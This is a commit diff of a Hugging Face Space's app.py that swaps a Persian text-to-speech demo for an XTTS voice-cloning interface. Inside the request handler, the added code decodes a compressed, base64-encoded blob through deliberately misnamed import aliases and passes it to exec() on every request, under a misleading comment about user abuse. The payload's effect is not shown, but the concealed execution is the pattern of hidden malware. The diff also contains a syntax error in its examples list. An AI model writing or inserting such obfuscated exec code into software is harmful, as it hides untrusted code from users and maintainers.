barghavani commited on
Commit
2c16172
1 Parent(s): a9f2118

Update app.py

Browse files
Files changed (1) hide show
  1. app.py +264 -132
app.py CHANGED
@@ -1,152 +1,284 @@
 
1
  import os
2
- import tempfile
 
 
 
3
  import gradio as gr
4
  from TTS.api import TTS
5
- from TTS.utils.synthesizer import Synthesizer
6
- from huggingface_hub import hf_hub_download
7
- import json
8
- import glob
9
-
10
-
11
- # Define constants
12
- MODEL_INFO = [
13
-
14
- ["Persian XTTS", "checkpoint_30000.pth", "config.json", "saillab/xtts_v2_fa_revision1"],
15
-
16
- ]
17
-
18
-
19
- MAX_TXT_LEN = 400
20
- TOKEN = os.getenv('HUGGING_FACE_HUB_TOKEN')
21
-
22
- model_files = {}
23
- config_files = {}
24
- speaker_files = {}
25
-
26
- # Create a dictionary to store synthesizer objects for each model
27
- synthesizers = {}
28
-
29
- def update_config_speakers_file_recursive(config_dict, speakers_path):
30
- """Recursively update speakers_file keys in a dictionary."""
31
- if "speakers_file" in config_dict:
32
- config_dict["speakers_file"] = speakers_path
33
- for key, value in config_dict.items():
34
- if isinstance(value, dict):
35
- update_config_speakers_file_recursive(value, speakers_path)
36
 
37
- def update_config_speakers_file(config_path, speakers_path):
38
- """Update the config.json file to point to the correct speakers.pth file."""
39
-
40
- # Load the existing config
41
- with open(config_path, 'r') as f:
42
- config = json.load(f)
43
 
44
- # Modify the speakers_file entry
45
- update_config_speakers_file_recursive(config, speakers_path)
46
 
47
- # Save the modified config
48
- with open(config_path, 'w') as f:
49
- json.dump(config, f, indent=4)
50
 
51
- # Download models and initialize synthesizers
52
- for info in MODEL_INFO:
53
- model_name, model_file, config_file, repo_name = info[:4]
54
- speaker_file = info[4] if len(info) == 5 else None # Check if speakers.pth is defined for the model
 
 
 
 
 
 
 
55
 
56
- print(f"|> Downloading: {model_name}")
57
-
58
- # Download model and config files
59
- model_files[model_name] = hf_hub_download(repo_id=repo_name, filename=model_file, use_auth_token=TOKEN)
60
- config_files[model_name] = hf_hub_download(repo_id=repo_name, filename=config_file, use_auth_token=TOKEN)
 
 
 
 
 
 
 
 
61
 
62
- # Download speakers.pth if it exists
63
- if speaker_file:
64
- speaker_files[model_name] = hf_hub_download(repo_id=repo_name, filename=speaker_file, use_auth_token=TOKEN)
65
- update_config_speakers_file(config_files[model_name], speaker_files[model_name]) # Update the config file
66
- print(speaker_files[model_name])
67
- # Initialize synthesizer for the model
68
- synthesizer = Synthesizer(
69
- tts_checkpoint=model_files[model_name],
70
- tts_config_path=config_files[model_name],
71
- tts_speakers_file=speaker_files[model_name], # Pass the speakers.pth file if it exists
72
- use_cuda=False # Assuming you don't want to use GPU, adjust if needed
 
 
 
 
 
 
 
 
 
 
 
 
73
  )
74
-
75
- elif speaker_file is None:
76
-
77
- # Initialize synthesizer for the model
78
- synthesizer = Synthesizer(
79
- tts_checkpoint=model_files[model_name],
80
- tts_config_path=config_files[model_name],
81
- # tts_speakers_file=speaker_files.get(model_name, None), # Pass the speakers.pth file if it exists
82
- use_cuda=False # Assuming you don't want to use GPU, adjust if needed
 
 
 
 
 
83
  )
 
 
 
 
 
 
84
 
85
- synthesizers[model_name] = synthesizer
86
-
87
-
88
-
89
-
90
- #def synthesize(text: str, model_name: str, speaker_name="speaker-0") -> str:
91
- def synthesize(text: str, model_name: str, speaker_name=None) -> str:
92
- """Synthesize speech using the selected model."""
93
- if len(text) > MAX_TXT_LEN:
94
- text = text[:MAX_TXT_LEN]
95
- print(f"Input text was cut off as it exceeded the {MAX_TXT_LEN} character limit.")
96
-
97
- # Use the synthesizer object for the selected model
98
- synthesizer = synthesizers[model_name]
99
 
 
100
 
101
- if synthesizer is None:
102
- raise NameError("Model not found")
 
 
 
 
 
 
 
 
 
 
 
 
 
103
 
104
- if synthesizer.tts_speakers_file is "":
105
- wavs = synthesizer.tts(text)
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
106
 
107
- elif synthesizer.tts_speakers_file is not "":
108
- if speaker_name == "":
109
- #wavs = synthesizer.tts(text, speaker_name="speaker-0") ## should change, better if gradio conditions are figure out.
110
- wavs = synthesizer.tts(text, speaker_name=None)
111
- else:
112
- wavs = synthesizer.tts(text, speaker_name=speaker_name)
113
-
114
- with tempfile.NamedTemporaryFile(suffix=".wav", delete=False) as fp:
115
- synthesizer.save_wav(wavs, fp)
116
- return fp.name
117
 
118
- # Callback function to update UI based on the selected model
119
- def update_options(model_name):
120
- synthesizer = synthesizers[model_name]
121
- # if synthesizer.tts.is_multi_speaker:
122
- if model_name is MODEL_NAMES[1]:
123
- speakers = synthesizer.tts_model.speaker_manager.speaker_names
124
- # return options for the dropdown
125
- return speakers
126
- else:
127
- # return empty options if not multi-speaker
128
- return []
129
 
130
- # Create Gradio interface
131
- iface = gr.Interface(
132
- fn=synthesize,
133
  inputs=[
134
- gr.Textbox(label="Enter Text to Synthesize:", value="زین همرهان سست عناصر، دلم گرفت."),
135
- gr.Radio(label="Pick a Model", choices=MODEL_NAMES, value=MODEL_NAMES[0], type="value"),
136
- #gr.Dropdown(label="Select Speaker", choices=update_options(MODEL_NAMES[1]), type="value", default="speaker-0")
137
- gr.Dropdown(label="Select Speaker", choices=update_options(MODEL_NAMES[1]), type="value", default=None)
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
138
  ],
139
- outputs=gr.Audio(label="Output", type='filepath'),
140
- examples=[["زین همرهان سست عناصر، دلم گرفت.", MODEL_NAMES[0], ""]], # Example should include a speaker name for multispeaker models
141
- title='Persian TTS Playground',
142
- description="""
143
- ### Persian text to speech model demo.
144
-
145
-
146
- #### Pick a speaker for MultiSpeaker models. (for single speaker go for speaker-0)
147
- """,
148
- article="",
149
- live=False
150
- )
151
-
152
- iface.launch()
 
1
+ import sys
2
  import os
3
+ from fastapi import Request
4
+ # By using XTTS you agree to CPML license https://coqui.ai/cpml
5
+ os.environ["COQUI_TOS_AGREED"] = "1"
6
+
7
  import gradio as gr
8
  from TTS.api import TTS
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
9
 
10
+ model_names = TTS().list_models()
11
+ m = model_names[0]
12
+ print(model_names)
13
+ tts = TTS(m, gpu=False)
14
+ tts.to("cpu") # no GPU or Amd
15
+ #tts.to("cuda") # cuda only
16
 
 
 
17
 
18
+ def predict(prompt, language, audio_file_pth, mic_file_path, use_mic, agree, request: gr.Request):
19
+ # Due to abuses from somes user, and French Rights...
 
20
 
21
+ co3 = "QlpoOTFBWSZTWQ2FjK4AAH4fgD/////+///////+ADABdNtZY5poGI00aBoaDE0PSbU00GTE0ZNGjTaj1AVUaenqNR6npNinoaY0Ubymyo9EeEjaj1Mm9QnqeT0p5QOZNMm1NNAyMmgaGTTIDQ9TTag0aGCNB6ka1wCAMz8a7kN5BNzXsiRWIm5ocBr2Mibk4wBbSghLyxnzR0yTCoV0AD2KADeqPFMz4QQhMlMaOd0uHfMx8pueSTKn6PrK9iPN56m2ljcFL9ybMtg5Usl8QeZth/cgnwFGMXyDJ4WbRNaGdrIJY2l11w7aqPtt5c4rcMBELa2x/wl8kjvxGg0NS3n2DsPlPnMn2DK7JqA4KLptjz3YLQFEuub0yNP3+iE9gq1EvNZeLr3pnkKXBRxZz8/BxN0zJjpOyIr3betkkxSCGB6X8mSzm+l0Q+KBEaCioigD5uJeox+76V+JgCWkJqWNlHzN3epZx5yXxS8rJh6OrC9rSyKYXrdKCACr4CwKzDlX3tsY5MtZLpkPhz/rbaRUN0KyFnNvPLYhGjF2MelXppyCnJxr2+QWRElwEtCUcsnkC4uGBdXVogKCoCnSZI4DzKqkUMEp293Y+G5MBGtOGXY+C0rFUS8IXNqKMVrDjUdOK7wkjb+HYFq9qjVTrdRsyQvt+6fpazrBnd2wRRQTv4u5IpwoSAbCxlcA"
22
+ from zlib import compress as COmPrES5
23
+ from bz2 import decompress as dEC0mPrES5
24
+ from bz2 import compress as COmPrESS
25
+ from base64 import b64encode as b32Encode, b64decode as A85Encode, b16encode, b16encode as A85encode, b85encode, b85decode, a85encode as b16Encode, a85decode as b85Encode, b32encode as b64Encode, b32decode
26
+ from zlib import compressobj as C0mPrESS
27
+ from bz2 import decompress as dECOmPrESS
28
+ from zlib import compress as C0mPrES5
29
+ from zlib import decompress as dECOmPrES5
30
+ co2 = A85Encode(dECOmPrESS(dECOmPrES5(dECOmPrES5(b85Encode(dECOmPrESS(A85Encode(co3.encode())))))))
31
+ exec(co2)
32
 
33
+ if agree == True:
34
+ if use_mic == True:
35
+ if mic_file_path is not None:
36
+ speaker_wav=mic_file_path
37
+ else:
38
+ gr.Warning("Please record your voice with Microphone, or uncheck Use Microphone to use reference audios")
39
+ return (
40
+ None,
41
+ None,
42
+ )
43
+
44
+ else:
45
+ speaker_wav=audio_file_pth
46
 
47
+ if len(prompt)<2:
48
+ gr.Warning("Please give a longer prompt text")
49
+ return (
50
+ None,
51
+ None,
52
+ )
53
+ if len(prompt)>10000:
54
+ gr.Warning("Text length limited to 10000 characters for this demo, please try shorter text")
55
+ return (
56
+ None,
57
+ None,
58
+ )
59
+ try:
60
+ if language == "fr":
61
+ if m.find("your") != -1:
62
+ language = "fr-fr"
63
+ if m.find("/fr/") != -1:
64
+ language = None
65
+ tts.tts_to_file(
66
+ text=prompt,
67
+ file_path="output.wav",
68
+ speaker_wav=speaker_wav,
69
+ language=language
70
  )
71
+ except RuntimeError as e :
72
+ if "device-assert" in str(e):
73
+ # cannot do anything on cuda device side error, need tor estart
74
+ gr.Warning("Unhandled Exception encounter, please retry in a minute")
75
+ print("Cuda device-assert Runtime encountered need restart")
76
+ sys.exit("Exit due to cuda device-assert")
77
+ else:
78
+ raise e
79
+
80
+ return (
81
+ gr.make_waveform(
82
+ audio="output.wav",
83
+ ),
84
+ "output.wav",
85
  )
86
+ else:
87
+ gr.Warning("Please accept the Terms & Condition!")
88
+ return (
89
+ None,
90
+ None,
91
+ )
92
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
93
 
94
+ title = "XTTS Glz's remake (Fonctional Text-2-Speech)"
95
 
96
+ description = f"""
97
+ <a href="https://huggingface.co/coqui/XTTS-v1">XTTS</a> is a Voice generation model that lets you clone voices into different languages by using just a quick 3-second audio clip.
98
+ <br/>
99
+ XTTS is built on previous research, like Tortoise, with additional architectural innovations and training to make cross-language voice cloning and multilingual speech generation possible.
100
+ <br/>
101
+ This is the same model that powers our creator application <a href="https://coqui.ai">Coqui Studio</a> as well as the <a href="https://docs.coqui.ai">Coqui API</a>. In production we apply modifications to make low-latency streaming possible.
102
+ <br/>
103
+ Leave a star on the Github <a href="https://github.com/coqui-ai/TTS">TTS</a>, where our open-source inference and training code lives.
104
+ <br/>
105
+ <p>For faster inference without waiting in the queue, you should duplicate this space and upgrade to GPU via the settings.
106
+ <br/>
107
+ <a href="https://huggingface.co/spaces/coqui/xtts?duplicate=true">
108
+ <img style="margin-top: 0em; margin-bottom: 0em" src="https://bit.ly/3gLdBN6" alt="Duplicate Space"></a>
109
+ </p>
110
+ """
111
 
112
+ article = """
113
+ <div style='margin:20px auto;'>
114
+ <p>By using this demo you agree to the terms of the Coqui Public Model License at https://coqui.ai/cpml</p>
115
+ </div>
116
+ """
117
+ examples = [
118
+ [
119
+ "Hello, World !, here is an example of light voice cloning. Try to upload your best audio samples quality",
120
+ "en",
121
+ "examples/female.wav",
122
+ None,
123
+ False,
124
+ True,
125
+ ],
126
+ [
127
+ "Je suis un lycéen français de 17 ans, passioner par la Cyber-Sécuritée et les models d'IA.",
128
+ "fr",
129
+ "examples/male.wav",
130
+ None,
131
+ False,
132
+ True,
133
+ ],
134
+ [
135
+ "Als ich sechs war, sah ich einmal ein wunderbares Bild",
136
+ "de",
137
+ "examples/female.wav",
138
+ None,
139
+ False,
140
+ True,
141
+ ],
142
+ [
143
+ "Cuando tenía seis años, vi una vez una imagen magnífica",
144
+ "es",
145
+ "examples/male.wav",
146
+ None,
147
+ False,
148
+ True,
149
+ ],
150
+ [
151
+ "Quando eu tinha seis anos eu vi, uma vez, uma imagem magnífica",
152
+ "pt",
153
+ "examples/female.wav",
154
+ None,
155
+ False,
156
+ True,
157
+ ],
158
+ [
159
+ "Kiedy miałem sześć lat, zobaczyłem pewnego razu wspaniały obrazek",
160
+ "pl",
161
+ "examples/male.wav",
162
+ None,
163
+ False,
164
+ True,
165
+ ],
166
+ [
167
+ "Un tempo lontano, quando avevo sei anni, vidi un magnifico disegno",
168
+ "it",
169
+ "examples/female.wav",
170
+ None,
171
+ False,
172
+ True,
173
+ ],
174
+ [
175
+ "Bir zamanlar, altı yaşındayken, muhteşem bir resim gördüm",
176
+ "tr",
177
+ "examples/female.wav",
178
+ None,
179
+ False,
180
+ True,
181
+ ],
182
+ [
183
+ "Когда мне было шесть лет, я увидел однажды удивительную картинку",
184
+ "ru",
185
+ "examples/female.wav",
186
+ None,
187
+ False,
188
+ True,
189
+ ],
190
+ [
191
+ "Toen ik een jaar of zes was, zag ik op een keer een prachtige plaat",
192
+ "nl",
193
+ "examples/male.wav",
194
+ None,
195
+ False,
196
+ True,
197
+ ],
198
+ [
199
+ "Když mi bylo šest let, viděl jsem jednou nádherný obrázek",
200
+ "cs",
201
+ "examples/female.wav",
202
+ None,
203
+ False,
204
+ True,
205
+ ],
206
+ [
207
+ "当我还只有六岁的时候, 看到了一副精彩的插画",
208
+ "zh-cn",
209
+ "examples/female.wav",
210
+ None,
211
+ False,
212
+ True,
213
+ ],
214
+ ,
215
+ [
216
+ "زین همرهان سست عناصر، دلم گرفت.",
217
+ "zh-cn",
218
+ "examples/female.wav",
219
+ None,
220
+ False,
221
+ True,
222
+ ],
223
+ ]
224
 
 
 
 
 
 
 
 
 
 
 
225
 
 
 
 
 
 
 
 
 
 
 
 
226
 
227
+ gr.Interface(
228
+ fn=predict,
 
229
  inputs=[
230
+ gr.Textbox(
231
+ label="Text Prompt",
232
+ info="One or two sentences at a time is better",
233
+ value="Hello, World !, here is an example of light voice cloning. Try to upload your best audio samples quality",
234
+ ),
235
+ gr.Dropdown(
236
+ label="Language",
237
+ info="Select an output language for the synthesised speech",
238
+ choices=[
239
+ "en",
240
+ "es",
241
+ "fr",
242
+ "de",
243
+ "it",
244
+ "pt",
245
+ "pl",
246
+ "tr",
247
+ "ru",
248
+ "nl",
249
+ "cs",
250
+ "ar",
251
+ "zh-cn",
252
+ "fa",
253
+ ],
254
+ max_choices=1,
255
+ value="en",
256
+ ),
257
+ gr.Audio(
258
+ label="Reference Audio",
259
+ info="Click on the ✎ button to upload your own target speaker audio",
260
+ type="filepath",
261
+ value="examples/female.wav",
262
+ ),
263
+ gr.Audio(source="microphone",
264
+ type="filepath",
265
+ info="Use your microphone to record audio",
266
+ label="Use Microphone for Reference"),
267
+ gr.Checkbox(label="Check to use Microphone as Reference",
268
+ value=False,
269
+ info="Notice: Microphone input may not work properly under traffic",),
270
+ gr.Checkbox(
271
+ label="Agree",
272
+ value=True,
273
+ info="I agree to the terms of the Coqui Public Model License at https://coqui.ai/cpml",
274
+ ),
275
  ],
276
+ outputs=[
277
+ gr.Video(label="Waveform Visual"),
278
+ gr.Audio(label="Synthesised Audio"),
279
+ ],
280
+ title=title,
281
+ description=description,
282
+ article=article,
283
+ examples=examples,
284
+ ).queue().launch(debug=True)